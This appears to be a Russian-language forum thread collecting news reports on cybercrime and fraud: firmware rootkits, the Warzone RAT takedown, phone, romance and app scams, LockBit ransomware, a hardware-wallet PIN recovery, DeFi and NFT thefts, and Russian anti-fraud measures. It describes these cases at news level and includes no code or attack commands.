Для обхода обнаружения злоумышленники маскируют руткит iLOBleed под модуль прошивки iLO. Они также создали поддельный интерфейс обновления, отображающийся системным администраторам, когда они пытаются обновить прошивку iLO.
Несмотря на то, что руткит предоставляет полный контроль над зараженной системой, злоумышленники, похоже, использовали его только для удаления данных. Когда исследователи безопасности обнаружили руткит, хакеры стерли все диски сервера, чтобы полностью удалить все свои следы.
• Source: <https://threats.amnpardaz.com/en/2021/12/28/implant-arm- ilobleed-a/>
Президент России Владимир Путин дал поручение Министерству юстиции заключить договор о выдаче преступников с Таиландом. Распоряжение главы государства опубликовано на портале правовой информации.
Минюст обязан достичь окончательной договоренности с Таиландом о содержании документа, после чего получит право на его подписание. При этом Путин разрешил вносить в проект документа непринципиальные изменения. Стоит отметить, что это соглашение прорабатывается уже на протяжении нескольких лет. В частности, еще в феврале 2022 года Путин одобрил соответствующее предложение правительства, однако тогда работа на российской стороне не сдвинулась с мертвой точки.
Уже в марте 2023 года правительство Таиланда со своей стороны согласовало проект соглашении о взаимной экстрадиции. Тогда отмечалось, что власти пошли на это из-за увеличения количества прибывающих в страну россиян, некоторые из которых могут иметь отношение к преступной или киберпреступной деятельности.
publication.pravo.gov.ru/document/0001202406240006
Специалисты Kaspersky Lab рассказал о новой китайской хакерской группе, которая атаковала высокопоставленные лица в Юго-Восточной Азии как минимум с июля 2020 года. Она использовала очень сложные инструменты, которые могли работать с Windows 10.
Группу назвали GhostEmperor. Хакеры часто пытались получить долгосрочный доступ к компьютерам жертв через руткит, способный работать на Windows 10. Вредоносному удавалось оставаться незамеченным месяцы.
Специалисты выяснили, что хакеры использовали эксплойты для серверов Apache, Oracle и Microsoft Exchange, чтобы взломать сети, близкие к целевой. Затем группа переключилась на более чувствительные системы внутри сети жертвы. GhostEmperor использовал набор различных скриптов и инструментов для развёртывания бэкдоров в целевой сети. Бэкдоры затем применялись для загрузки инструмента Cheat Engine. Это помогало обходить функции безопасности Windows PatchGuard и устанавливать руткит в ОС.
Исследователи заявили, что руткит, получивший название Demodex, был чрезвычайно продвинутым и позволял группе сохранять доступ к устройству жертвы даже после переустановки системы.
Специалисты «Лаборатории Касперского» не раскрыли, на кого именно охотилась группа. Они сказали лишь, что GhostEmperor преследовала правительственные учреждения и телекоммуникационные компании в Юго-Восточной Азии (Малайзия, Таиланд, Вьетнам и Индонезия), а также в Египте, Афганистане и Эфиопии.
• Source: [https://media.kasperskycontenthub.c...37/GhostEmperor_technical- details_PDF_eng.pdf](https://media.kasperskycontenthub.com/wp- content/uploads/sites/43/2021/09/30094337/GhostEmperor_technical- details_PDF_eng.pdf)
Мечтаю увидеть на этом форуме профессиональную подробную статью про взлом банкоматов, почему это igjo
Министерство юстиции США объявило о конфискации онлайн-инфраструктуры, использовавшейся для продажи трояна для удаленного доступа (RAT) под названием Warzone RAT. Были изъяты 4 домена, включая www.warzone[.]ws .
В рамках операции международные правоохранительные органы арестовали и предъявили обвинения двум лицам в Мальте и Нигерии за их участие в продаже и поддержке вредоносного ПО, а также за помощь другим киберпреступникам в использовании трояна в злонамеренных целях.
Обвиняемым Даниэлю Мели (27 лет) и принцу Онеозири Одинакачи (31 год) предъявлено обвинение в несанкционированном повреждении защищенных компьютеров, причем первый также обвиняется в «незаконной продаже и рекламе электронного устройства перехвата, и участии в сговоре с целью совершения нескольких компьютерных вторжений».
Утверждается, что Мели предлагал услуги по вредоносному ПО по крайней мере с 2012 года через хакерские форумы, распространяя электронные книги и помогая другим преступникам использовать RAT для проведения кибератак. Как и Мели, Одинакачи также предоставлял онлайн-поддержку покупателям вредоносного ПО Warzone RAT с июня 2019 года.
Продаваемый по MaaS-модели за $38 в месяц (или $196 в год), Warzone RAT (Ave Maria) функционирует как инфостилер и обеспечивает удаленное управление, позволяя злоумышленнику захватывать зараженные хосты для дальнейшего использования. Среди заметных функций вредоносного ПО – возможность просматривать файловые системы жертв, делать снимки экрана, записывать нажатия клавиш (кейлоггинг), похищать учетные данные жертв, а также незаметно активировать веб-камеры компьютеров.
DoJ сообщило, что ФБР тайно приобрело копии Warzone RAT и подтвердило его вредоносные функции. Координированная операция включала помощь со стороны властей Австралии, Канады, Хорватии, Финляндии, Германии, Японии, Мальты, Нидерландов, Нигерии, Румынии и Европола.
• Source: https://www.justice[.]gov/opa/pr/in...mantled-federal-authorities- key-malware-sales
Сотрудники угрозыска Главного управления МВД России по городу Санкт-Петербургу и Ленинградской области задержали шестерых бизнесменов, которые подозреваются в совершении мошеннических действий в отношении пенсионеров, многие из которых являются ветеранами Великой Отечественной войны или жителями блокадного Ленинграда. Как сообщила 26 декабря официальный представитель МВД РФ Ирина Волк, задержания проходили на территории самой Северной столицы, а также в Рязанской и Московской областях.
Поиски мошенников начались после того, как в полицию с сентября по декабрь поступили обращения 25 пожилых жительниц Санкт-Петербурга, которых злоумышленники атаковали телефонными звонками под видом медицинских работников, убеждая, что у женщин есть проблемы со здоровьем.
«Фигуранты убеждали собеседниц пройти курс лечения редкими и дорогостоящими лекарственными препаратами, которые якобы по счастливому стечению обстоятельств у них есть в наличии. Поверив, женщины покупали эти средства, заплатив от 380 тыс. до 1 млн рублей»
Click to expand...
Возбуждены уголовные дела по признакам преступлений, предусмотренных ст. 159 УК РФ («Мошенничество»), которые соединены в одно производство. Общий ущерб превысил 3 млн рублей.
По адресам проживания фигурантов после обысков изъяты восемь мобильных телефонов, банковские карты, ноутбук, блокноты с черновыми записями и другие предметы. Обвиняемые заключены под стражу. У следствия есть основания полагать, что они могут быть причастны к совершению еще более 20 таких же деяний.
В мае восемь торговцев криптовалютой были арестованы правоохранительными органами провинции Герат и провели в тюремном заключении 28 дней.
Один из криптотрейдеров, который предпочел сохранить свою анонимность, рассказал изданию Сrypto.news, что полиция, контролируемая движением Талибан, арестовала его и еще семерых за сам факт торговли цифровыми активами.
«Ранее Центральный банк Афганистана велел остановить весь обмен валют, не давать частным лицам и бизнесменам торговать мошенническими цифровыми монетами вроде биткоина», – объяснил изданию глава отдела уголовных расследований полицейского управления Герата Сайед Шах Саадаат (Syed Shah Saadaat).
Click to expand...
В августе 2021-го, после вывода из Афганистана американских войск, к власти в стране пришли сторонники движения Талибан, и Афганистан оказался отрезан от системы банковского обслуживания. На этом фоне значительная часть граждан обратило внимание на цифровые активы как на единственно возможный способ получения финансовой помощи из-за рубежа и защиты своих накоплений.
Режим талибов ввел общенациональный запрет на любую криптовалюту, назвав ее греховным бизнесом. Нарушителям запретов новой администрации Афганистана грозит тюремный срок до шести месяцев и конфискация криптоактивов. В июне 2022 года Центральный банк Афганистана запретил операции с цифровыми активами, а представители Талибана закрыли порядка 16 криптовалютных бирж и провели показательные аресты бизнесменов.
В Запорожской области в УМВД России «Мелитопольское» обратилась местная жительница, которая стала жертвой мошенника. Женщина рассказала, что в популярном телеграм-канале вступила в переписку с другим пользователем, договорилась с ним о покупке дорогостоящей запчасти на автомобиль, после чего перевела ему около 20 тысяч рублей. Получив деньги, продавец перестал выходить на связь. Подождав несколько дней, потерпевшая поняла, что её обманули.
Оперативники Запорожской области провели необходимый комплекс мероприятий и установили подозреваемого. Им оказался 29-летний житель Москвы. Выяснилось, что ранее судимый за мошенничество мужчина зарегистрировался под чужим именем в популярных интернет-сообществах в новых регионах и предлагал потенциальным покупателям товары по заниженной цене. После перевода денег продавец исчезал.
Сотрудники областного управления уголовного розыска установили причастность злоумышленника к трём фактам противоправной деятельности. Общая сумма ущерба составила более 40 тысяч рублей. В отношении афериста возбуждено уголовное дело по статье 159 Уголовного кодекса Российской Федерации. Сейчас полицейские проверяют его на причастность к другим мошенничествам.
• Video: https://mvdmedia.ru/upload/medialibrary/731/hvcrtlwiauxftv25ykljyyhex59t4zub.mp4
Курьезный случай [произошел](https://www.straitstimes.com/singapore/woman- loses-over-44k-after-downloading-third-party-app-to-buy-fish) с женщиной из Сингапура в прошлом месяце. У Жаклин Ху украли $44 487 долларов со счетов после того, как она cкачала стороннее приложение от мошенников.
В погоне за бесплатным сыром в мышеловке, Ху наткнулась на привлекательную рекламу в Facebook от поставщика морепродуктов под названием "Fresh Market TGS". Её привлекло предложение, в котором предлагалось купить филе морского окуня всего за $10 с бесплатной доставкой, после чего она решила связаться с продавцом через Facebook.
"Объявление не вызвало у меня подозрений, и мне даже в голову не пришло, что это мошенничество", - рассказала она газете The Straits Times.
Социальный инженер под видом продавца написал Ху сообщение в WhatsApp с просьбой загрузить на свой телефон странное приложение под названием Grab&Go. При открытии приложения ей было предложено внести $5 через PayNow в качестве "депозита" перед оформлением заказа, но она решила уточнить - а можно ли оплатить заказ, когда он будет доставлен....
Продавец несуществующей рыбки заверил ее, что ему не нужны банковские реквизиты, вместо этого он попросил женщину ввести в приложении свое имя, адрес и номер телефона, чтобы проверить покупку.
Спустя время, Ху заметила, как ее телефон "сильно нагрелся", а экран стал "пустым". Когда телефон дважды самостоятельно перезагрузился, она интуитивно решила удалить приложение и бросилась заряжать телефон, подумав, что разрядилась батарея.
Через 3 дня, когда она решила проверить получение зарплаты — обнаружила, что на её банковских счетах "осталось несколько долларов". Мошенники увеличили лимит ее операций с 25 до 50 тыс. долл. и перевели около 32 000 долларов с трех ее сберегательных счетов в POSB на счет в Hong Leong Bank. Также Ху обнаружила пропажу еще 12 000 долл. с 2 счетов кредитных карт POSB.
"Все пропало. Я не могу спать и не могу есть. Это были мои заработанные тяжким трудом деньги, которые нужны для оплаты обучения младшей дочери в школе и страховки", - пожаловалась Жаклин Ху.
Сейчас полиция занимается расследованием данного дела. Женщина утверждает, что "не получала никаких одноразовых паролей (OTP) в SMS-сообщениях, отправленных банком для подтверждения несанкционированных операций". Теперь она очень напугана и расстроена.
С января по июнь 2023 года в Cингапуре было зарегистрировано 22 339 случаев мошенничества, что на 64,5% больше, чем за аналогичный период прошлого года (13 576 случаев). Примерный ущерб - 334,5 млн. долл.
Показательный случай когда нужно избегать ставить себе на телефон всякую дрянь в виде сторонних приложений [промо, скидки, акции, вот это всё] и общаться непонятно с кем по WhatsApp.
Оскорбительные заявления злоумышленника увидели 8 миллионов подписчиков
Диснейленда в Instagram.
Инцидент произошел рано утром в четверг. Хакер на короткое время получил
доступ к аккаунтам Диснейленда в соцсетях и оставил после себя множество
расистских и гомофобных сообщений. Среди взломанных аккаунтов были официальные
аккаунты парка развлечений в Instagram и Facebook.
В одном из сообщений, оставленных в Instagram, злоумышленник представился как
Дэвид До, назвал себя “суперхакером” и сказал, что мстит Диснейленду. По
словам хакера, он подвергался оскорблениям со стороны работников парка
развлечений.
[](https://lh3.googleusercontent.com/__-
npkBQK_QdO1gJ6ECJzLOJljTQ1-vzgbdIuY0n4t61l86XIXilJmwwqEoyIyjkvBfNvAWTClnmtcSaL7t-Y1cnqmTHdDRH0a-aWUnToDv3bwxVjDWN2YgzPygAQw0oWFRSMfB7V2RC-
oN6mw)
Аналогичные сообщения появились на странице парка развлечений в Facebook.
Сейчас все сообщения удалены, а доступ к аккаунтам восстановлен.
"Наши аккаунты в Facebook и Instagram были взломаны сегодня рано утром", -
говорится в официальном заявлении представителя Диснейленда. "Мы быстро
удалили оскорбительный контент, защитили наши аккаунты и начали
расследование".
Специализированным следственным отделом Следственного управления УМВД России по г. Калуге окончено расследование уголовного дела, возбужденного по признакам преступления, предусмотренного пунктом «г» части 3 статьи 158 Уголовного кодекса Российской Федерации «Кража».
По версии правоохранителей, 28-летний житель города Волгограда совершал хищения денежных средств с банковских счетов калужан и жителей других регионов. Для этого он в социальной сети знакомился с потерпевшими, узнавал в ходе общения номера их телефонов, после чего осуществлял им звонки, представляясь при этом сотрудником банка.
В ходе разговора фигурант сообщал гражданам ложную информацию о том, что им начислены дополнительные бонусы за расчеты банковской картой. Под предлогом подтверждения личности он просил собеседников назвать номер банковской карты и код, поступивший им в смс-сообщении с сервисного номера кредитной организации. Используя озвученные данные, фигурант получал доступ к управлению банковскими счетами потерпевших, после чего осуществлял операции по переводу с них денежных средств на подконтрольные ему счета.
Следствием собрана достаточная доказательная база, позволяющая установить причастность гражданина к девяти аналогичным эпизодам противоправной деятельности. Общий ущерб, причиненный потерпевшим, составил более 200 тысяч рублей.
Материалы уголовного дела для рассмотрения направлены в суд.
Компьютерный инженер Джо Гранд использовал уязвимость аппаратного кошелька Trezor One, чтобы вернуть криптоактивы на сумму более $2 млн пользователю, потерявшему PIN-код.
Белый хакер Джо Гранд (Joe Grand), известный под ником «Kingpin» («Вор в законе»), разместил на Youtube видео, в котором рассказал, как ему удалось взломать аппаратный кошелек Trezor One. Таким образом компьютерный инженер из Портленда помог вернуть деньги предпринимателю из Нью-Йорка Дэну Райху (Dan Reich), который потерял PIN-код от кошелька.
Еще в 2018 году Райх решил обналичить около $50 000, однако обнаружил, что потерял PIN-код от кошелька, на котором хранилась криптовалюта. После 12 безуспешных попыток угадать PIN-код он решил отложить вывод средств до лучших времен, чтобы избежать автоматической блокировки кошелька после 16 неправильных попыток.
Однако в этом году стоимость криптоактивов, хранящихся на кошельке Райха, выросла до $2 млн, и он решил пойти на крайние меры, чтобы получить деньги. Без сид-фразы или PIN-кода единственным способом вернуть доступ к криптоактивам оставался взлом.
Райх связался с Грандом и предложил взломать кошелек. Белый хакер на протяжении 12 недель пытался восстановить утерянный PIN-код. За это время он совершил множество проб и ошибок, но в конце концов нашел способ восстановить доступ к криптоактивам. Ключом ко взлому, как ни странно, послужила уязвимость старых моделей кошелька.
Во время обновления кошельки Trezor One временно перемещали PIN-код и ключ в ОЗУ, а затем возвращали их обратно во флэш-память. Гранд обнаружил, что в версии, установленной на кошельке Райха, эта информация не перемещалась, а копировалась в оперативную память. Это означает, что в случае неудачного взлома и стирания оперативной памяти PIN-код и ключ все равно будут храниться во флэш-памяти.
После кибератаки с внедрением ошибок – метода, который изменяет напряжение, подаваемое на чип, – Гранд смог обойти систему безопасности микроконтроллеров, нацеленную на предотвращение считывания ОЗУ хакерами, и получил PIN-код, необходимый для доступа к кошельку.
«Мы в основном вызываем неправильное поведение кремниевого чипа внутри устройства, чтобы обойти систему безопасности. В конце концов я смог обойти защиту и получить доступ к личной информации, сид-фразе для восстановления и PIN-коду», – объяснил Гранд.
Ранее производитель аппаратных кошельков Ledger сообщил об уязвимости, позволяющей считывать данные из оперативной памяти кошелька. По его словам, эта уязвимость встречается лишь в старых моделях и устранена на новых устройствах. Но до тех пор, пока не будут внесены изменения в механизм внедрения ошибок микроконтроллера, атаки по-прежнему могут представлять опасность для владельцев кошелька.
В 2020 году разработчик аппаратного кошелька BitBox02 заявил, что устройства Trezor могут быть уязвимы к атакам с требованием выкупа в криптовалютах. В 2019 году подразделение по информационной безопасности Ledger Donjon проверило аппаратные кошельки различных производителей и оказалось, что устройства Trezor можно взломать всего за 5 минут.
• Video:
Чемпионку мира по прыжкам в воду Светлану Тимошинину развели на миллион рублей от лица президента спортивной ассоциации.
Спортсменке пришло сообщение в ТГ от якобы Станислава Дружинина (президент Федерации прыжков в воду России). На аве аккаунта стояла именно его фотка, поэтому она не распознала фейк и стала вчитываться.
В тексте было написано, что скоро с ней свяжется куратор федерации и даст инструкции. Светлане сказали, что она на волоске от уголовного дела за попытки перевода денег со счетов в недружественные страны, женщина заволновалась.
Следом позвонили из ФСБ, а потом и ЦБ. Преступники по классике говорили о переводе на "безопасный счёт". Тимошинина сняла деньги в банке и передала их курьеру на самокате.
Округ Ланглейд (штат Висконсин, США) объявил о «катастрофическом программном сбое» после предполагаемой атаки программы-вымогателя LockBit.
11 июля правительственные учреждения округа Ланглейд на севере Висконсина опубликовали срочное предупреждение в социальных сетях о технических сбоях систем ведомств. По словам шерифа, проблемы не были связаны с кибератакой, но группа вымогателей LockBit на своём сайте добавила округ в список жертв, пригрозив утечкой всех данных, украденных у правительства, к 1 августа.
Из-за киберинцидента все телефонные линии перестали работать. Звонки в службу 911 будут перенаправлены и обработаны. Местный шериф предоставил временный номер телефона для тех, кто нуждается в помощи.
Публикация LockBit на сайте утечки
Предупреждениями поделились Департамент здравоохранения округа Ланглад , Управление по чрезвычайным ситуациям округа Ланглад и полицейское управление округа Антиго . Население округа составляет около 20 000 человек.
В последние месяцы разные города США, в том числе Хейвард , Окленд , Даллас , Лоуэлл и Огаста — стали жертвами по-настоящему серьёзных киберинцидентов с шифрованием, кражей данных, сопутствующим вымогательством и публикацией конфиденциальной информации граждан в открытом доступе.
Напомним, что группировка Lockbit взяла на себя ответственность за атаку на порт Нагоя , крупнейший и самый оживленный морской порт в Японии. Вымогательская атака с шифрованием данных существенно повлияла на работу контейнерных терминалов. Атака также повлияла на работу корпорации Toyota.
Кроме того, в конце июня на сайте LockBit появилось сообщение о том, что группа хакеров взломала сеть Taiwan Semiconductor Manufacturing Company (TSMC) , крупнейшего в мире производителя микросхем. Злоумышленники обещают опубликовать конфиденциальные данные компании 8 августа, если компания не заплатит огромный выкуп за расшифровку файлов.
Это третья многомиллионная криптоатака за последние дни.
Inverse Finance, протокол децентрализованного финансирования, ориентированный
на кредитование, стал объектом очевидного эксплойта в субботу, когда во время
инцидента была потеряна криптовалюта на сумму около 15 миллионов долларов.
На ситуацию впервые обратила внимание PeckShield , аналитическая фирма по
блокчейну.
Команда признала ситуацию в субботнем утреннем твите, написав: «В настоящее время мы занимаемся проблемой, пожалуйста, дождитесь официального объявления». Аналогичное сообщение было размещено на сервере Discord для InverseDAO, управляющей структуры протокола.
Данные блокчейна показывают, что взлом был совершен сразу после 11:00 по Гринвичу. Потерянные средства были номинированы в ETH, WBTC и DAI. Дальнейшие данные блокчейна указывают на то, что некоторые из украденных ETH были отправлены в Tornado Cash, популярный миксер транзакций в сети Ethereum, в течение часа после атаки.
Согласно Inverse, злоумышленник нацелился на денежный рынок Anchor (ANC), искусственно манипулируя ценами на токены, что позволило ему взять кредиты под крайне низкий залог.
«Сегодня утром один из рынков Inverse Finance, Anchor, подвергся капиталоемкой манипуляции с ценовым оракулом INV/ETH на SushiSwap, что привело к резкому росту котировок INV. В результате злоумышленник смог взять кредит на $15,6 млн в DOLA, ETH, WBTC и YFI», — написала команда проекта.
Это третий многомиллионный взлом протокола децентрализованных финансов (DeFi), который попал в заголовки новостей на этой неделе, и он подчеркивает все более изощренные методы, используемые злоумышленниками. Во вторник сеть Ronin , ориентированная на игры, объявила о потере более 625 миллионов долларов в криптовалюте, а затем, два дня спустя, протокол кредитования Ola Finance сообщил , хакеры смогли вывести 3,6 миллиона долларов.
source: twitter.com/peckshield/status/1510216100851552256
Group-IB помогла Guardia di Finanza, Финансовой гвардии Италии, задержать группу мошенников, которые торговали в Telegram поддельными Green Pass. «Зелёный паспорт» — это электронный сертификат с QR-кодом, свидетельствующий о том, что его владелец либо вакцинировался, либо уже переболел COVID-19, либо имеет отрицательный тест. В Италии с 15 октября Green Pass стал обязательным документом — он нужен не только для посещения музеев, кинотеатров, спортзалов или ресторанов, но и для того, чтобы даже попасть на работу.
Как и в России, на ситуации решили заработать мошенники. Амстердамскому подразделению по расследованию высокотехнологичных преступлений Group-IB удалось выявить 35 телеграмм-каналов, торгующих поддельными «зелеными паспортами». Чтобы получить сертификат, жертву просят в секретном чате Telegram сообщить продавцу свои персональные данные, якобы необходимые для генерации QR-кода. Цена за подделку составляла в среднем около 100 евро — оплатить покупку Green Pass можно было криптовалютой, денежными переводами PayPal или подарочными картами Amazon. Но, получив деньги и данные покупателя, мошенники либо исчезали, либо отправляли жертвам поддельные сертификаты.
Благодаря информации, собранной экспертами Group-IB, Guardia di Finanza провела задержания и обыски в Венето, Лигурии, Апулии и Сицилии.
Подробности спецоперации “NO-VAX FREE” в этом видео
из Италии.
Отсидевший за терроризм британец Хурам Икбал получил новый тюремный срок за торговлю данными в даркнете, включая незаконные криптовалютные транзакции на 12 000 фунтов стерлингов.
Хурам Икбал (Khuram Iqbal) с 10 ноября 2017 года по 20 марта 2021 года совершил 392 транзакции на сумму около 12 000 фунтов стерлингов ($15 000). В январе 2020 года Икбал провел три транзакции с биткоинами в даркнете на сайте для продажи похищенных учетных данных пользователей кредитных карт.
Криптовалютная биржа Coinbase опубликовала отчет о подозрительной активности, что побудило британскую полицию провести расследование деятельности бывшего террориста на рынке криптовалют. В августе 2021 года полиция провела обыск по адресу обвиняемого и изъяла мобильный телефон Икбала.
На устройстве были установлены приложения для работы с криптовалютами и браузер, обеспечивающий доступ к даркнету. В ходе полицейского допроса Икбал признал, что для криптовалютных транзакций использует два кошелька. Тем самым он нарушил приказ об уведомлении полиции о всех своих учетных записях сроком на 10 лет.
Подозреваемый отрицал, что использует даркнет для незаконной деятельности. Судья не согласился с преступником и его адвокатом, что нарушения его подзащитного были непреднамеренными, и приговорил Икбала к 16 месяцам тюрьмы.
Прокурор Пол Джарвис объяснил, как преступнику удалось обойти контроль правоохранительных органов. Он добавил, что все криптовалютные транзакции Икбал совершал незаконно.
«Природа криптовалют не позволяет их отследить, поэтому он мог управлять двумя адресами электронной почты и двумя криптовалютными кошельками, не вызывая подозрения полиции».
В июле власти Израиля конфисковали связанные с движением ХАМАС 84 криптовалютных кошелька с криптовалютами на $7.7 миллионов. В 2020 году французская полиция в ходе крупной операции [арестовала](https://abcnews.go.com/Technology/wireStory/french- arrest-29-cryptcurrency-scheme-finance-jihadis-73315042) 29 человек, подозреваемых в финансировании исламистских экстремистов в Сирии с помощью криптовалют. По данным НКО «Антитеррористический проект», ИГИЛ [хранила](https://www.counterextremism.com/sites/default/files/Cryptocurrencies%20as%20Threats%20to%20Public%20Security%20and%20Counter- Terrorism_ENG%20Translation_April%202020.pdf) более $300 миллионов в криптовалютах.
Клиенты банков, пострадавшие от действий дроперов — мошенников, обналичивающих украденные деньги, — могут получить возможность самостоятельно запрашивать данные этих лиц для подачи исков в суд. О разработке такой инициативы заявила вице-президент Ассоциации банков России (АБР) Яна Епифанова на круглом столе «Утечки данных: предотвращение, защита, ответственность», прошедшем в Госдуме. Мероприятие было приурочено к принятию во втором и третьем чтениях закона, устанавливающего оборотные штрафы за повторные утечки данных. Кроме того, в этот же день был принят закон о введении уголовной ответственности за утечки данных.
Епифанова пояснила, что на сегодняшний день банки не вправе предоставлять пострадавшим клиентам информацию о дроперах, которая может включать их ФИО и адрес регистрации, необходимых для обращения в суд. «То есть даже данные, необходимые для обращения в суд, банк сегодня не имеет права предоставить, – отметила она. – И у нас такая инициатива в проработке есть. Мы считаем, что банкам нужно дать такую возможность, чтобы клиенты за возмещением могли обращаться к тем, на чей счет поступили деньги».
Банки на текущий момент не предоставляют информацию гражданам из-за требований банковской тайны. При этом даже данные о дроперах не могут быть переданы, поскольку это требует соблюдения законодательных процедур. Эксперты отмечают, что такие сведения вряд ли помогут пострадавшим напрямую, так как клиент может обслуживаться в одном банке, а мошенник — в другом. Для получения данных о дроперах необходимо обращаться в правоохранительные органы, которые через суд могут запросить нужную информацию.
В случае перевода денежных средств на счета дроперов и невозможности самостоятельного установления личности владельца рекомендуется фиксировать факт правонарушения через заявление в полицию. Специалисты отмечают, что этот процесс требует значительных усилий, но при соблюдении всех процедур и определённой удаче возможен возврат утраченных средств.
Пострадавшим также советуют оперативно направить письменное обращение в банк с просьбой предоставить выписку о списании средств и указанием банка-получателя. Эксперты подчёркивают, что своевременное уведомление банка, получившего перевод, может предотвратить убытки для клиента и самой кредитной организации. Если списание средств произошло на основании поддельных документов, есть возможность взыскания убытков с банка. Однако на данный момент арест средств в рамках возбужденного уголовного дела остаётся единственным гарантированным способом их блокировки.
С 25 июля 2024 года вступили в силу поправки к закону «О национальной платежной системе», обязывающие банки приостанавливать переводы на два дня, если данные получателя включены в базу ЦБ о мошеннических операциях, иначе банк должен будет вернуть украденные деньги клиенту. Эти меры направлены на предотвращение необдуманных действий клиентов. Банк должен информировать отправителя о причинах заморозки и сроке приостановки перевода. Если клиент повторно инициирует операцию после двух дней охлаждения, банк обязан ее провести, освобождаясь от финансовой ответственности.
Еще одной мерой борьбы с мошенничеством может стать создание базы биометрических образцов (слепков голосов) мошенников для борьбы с киберпреступниками. Такая инициатива была озвучена Максутом Шадаевым на конференции «Безопасность клиента на первом месте», прошедшей 19 ноября. По словам источника, близкого к Министерству цифрового развития, передачи биометрических данных в МВД будут возможны только при наличии заявления от пострадавшего абонента и при условии, что оператор располагает записью разговора с мошенником. Передача данных будет осуществляться с согласия абонента и в рамках оперативно-розыскной деятельности.
На данный момент голосовой трафик фиксируется в соответствии с «законом Яровой». Возможность использования этих записей для борьбы с киберпреступностью будет регулироваться отдельным законопроектом.
Предполагается, что формирование биометрической базы будет осуществляться с использованием данных мобильных операторов, обладающих информацией о совершенных телефонных звонках. Голоса мошенников, ранее совершавших звонки жертвам, планируется включить в базу для их последующего распознавания и предотвращения дальнейших вызовов от этих лиц.
Основными целями злоумышленников были владельцы токенов Bored Ape Yacht Club и Mutant Ape Yacht Club.
Обвинители утверждают, что подозреваемые обманывали жертв с помощью фишингового сайта, который якобы должен добавить анимацию к их NFT. Пяти подозреваемым возрастом от 24 до 30 лет выдвинуты следующие обвинения:
Подозреваемые проводили свою фишинговую кампанию в период с конца 2021 года по начало 2022 года. Двое из них, которые, как утверждается, были главарями, содержатся в предварительном заключении, согласно репортажу Агентства Франс Пресс.
Заместитель начальника французского Центрального управления по борьбе с преступлениями, связанными с информационными и коммуникационными технологиями (OCLCTIC) Кристоф Дюран сказал, что власти подключились к расследованию, начатому пользователем Twitter под ником "ZachXBT".
ZachXBT называет себя "ищейкой на цепи" и "выжившим после rug pull, который стал 2D-детективом" и создал себе образ онлайн-детектива, расследующего инциденты мошенничества в сферах криптовалюты и NFT.
В своем блоге ZachXBT подробно описал расследование. Оно началось с обращения пользователя "Dilly Dilly", который рассказал онлайн-детективу о том, что злоумышленники украли у него токены BAYC после того, как он нажал на ссылку, которую ему отправил “верифицированный” участник сообщества BAYC в Discord. По словам пользователя, он одобрил транзакцию на сайте, который якобы должен был создать анимированную версию его NFT.
Подводя итоги, ZachXBT рассказал, как злоумышленники попытались отмыть деньги, заработанные на краденых NFT. Для этого они воспользовались ныне закрытым Tornado Cash.
Напомним, Минфин США в августе заблокировал криптоплатформу Tornado Cash. Произошло это из-за того, что сервис использовался для отмывания криптовалюты.
В Европе разгорается скандал с финансовой пирамидой JuicyFields. Создатели платформы предлагали людям зарабатывать на инвестициях в небольших производителей медицинского каннабиса. Прежде чем пирамида рухнула, в неё успели вложиться тысячи европейцев. По данным газеты El País, ущерб может достигать €10 млн, а за созданием пирамиды стоят двое россиян.
Компания JuicyFields появилась в начале 2020 года. Она предлагала людям простую схему заработка. Всё, что требовалось от вкладчиков, — инвестировать сумму в пределах от €50 до €180 000 в небольшие фермы, выращивающие каннабис.
После этого им оставалось только ждать, когда кусты вырастут и будут готовы к продаже. Наблюдать за ростом своих растений пользователи могли на специальном сайте. Организаторы проекта обещали вкладчикам прибыль до 66%.
Один из инвесторов JuicyFields, 35-летний испанец Давид Мартинес рассказал, что несколько раз приносил в организацию свои деньги. Начинал он с небольшой суммы в €200. Самый большой вклад составил €18 000. Все инвестиции окупались.
Летом 2022 года мужчина вложил в JuicyFields ещё €5500. И это была его последняя инвестиция в проект. Вскоре после этого компания начала рассылать вкладчикам письма, в которых просила «больше не продвигать и не рекламировать JuicyFields», ссылаясь якобы на забастовку сотрудников. Больше своих денег Мартинес не увидел.
После этого в европейские юридические фирмы посыпались заявления от вкладчиков JuicyFields. Обманутыми оказались тысячи человек. Например, в компанию адвоката Эмилии Забаллос пожаловались минимум 6000 человек. Юрист назвала эту историю одной из самых безумных, с которой ей пришлось сталкиваться за 34 года практики. Ещё 1400 заявлений поступило в юридическую компанию Martínez-Blanco.
Больше всего инвесторов у JuicyFields оказалось в Германии. На втором месте — Испания. Активно вкладывались в проект жители Франции и Португалии.
За созданием финансовой пирамиды, по данным издания, стоят двое мужчин с российскими паспортами — Павел Бергольц и Роберт Лайбах. Первому принадлежал 51% акций компании, второму — остальные 49%. Местонахождение обоих сейчас неизвестно.
Также, по некоторым данным, в организации пирамиды может быть замешана некая финансовая компания из Берлина, связанная с аристократической семьёй.
24-летний пацанчик из Красноярска обратился в полицию, рассказав, что познакомился с одной девушкой в VK. Представившись вымышленным именем, новоиспеченная спутница сообщила, что находится в командировке, но скоро должна вернутся в Красноярск.
Пара обащалась один месяц и сумела достичь близких отношений по переписке. За это время подруга частенько попадала в неприятные ситуации, в которой ей нужны были деньги. Сам же мамонт охотно верил во все сказки скамерши о «потерянных ключах от квартиры, необходимости оплатить работу мастера, невозможности купить лекарта и оплатить билет до родного города».
Девчуля обещала поставить бабки обратно, но в итоге пропала и перестала выходить на связь. Сам же бедолага перевел ей более 250 тысяч рублей. Написав заяву, спустя время надежда на справедливость пропала. Но буквально пару дней назад пришли вести: кидалу задержали. Ей оказалась 34-летняя жительница Новосибирска.
— В ходе шмона по хате у нее нашли десятки сим-карт, банковских карт, роутеры и несколько телефонов. За это время она успела развести еще четырех мохначей, которые передали ей в общем более 500 тысяч рублей.
Красноярцу девушка представилась как Елена Смирнова. Однако полицейские выяснили, что она использовала страницы с такими именами, как Елена Латьева, Эвелина Гесс, Виктория Миронова, Маргарита Рудько, Маргарита Рогова, Виктория Слакова, Диана Фирсова, и другими.
Ленинским (г. Минска) районным отделом Следственного комитета расследуется уголовное дело о мошенничестве, совершенном в особо крупном размере. Об этом БЕЛТА сообщили в Группе по информации и связи с общественностью УСК по г. Минску.
По данным следствия, 1 июня на телефон 71-летней пенсионерки поступил тревожный звонок. С ней якобы разговаривала расстроенная, как ей показалось, дочка, которая сообщила, что попала в аварию и по ее вине серьезно пострадал человек. Она сказала, что каждая минута на счету и потерпевшей требуется дорогостоящая операция, деньги на которую нужно срочно передать близким девушки.
Взволнованная пенсионерка поверила всему. Лжедочь предупредила, что в ближайшее время с женщиной свяжется представитель правоохранительных органов.
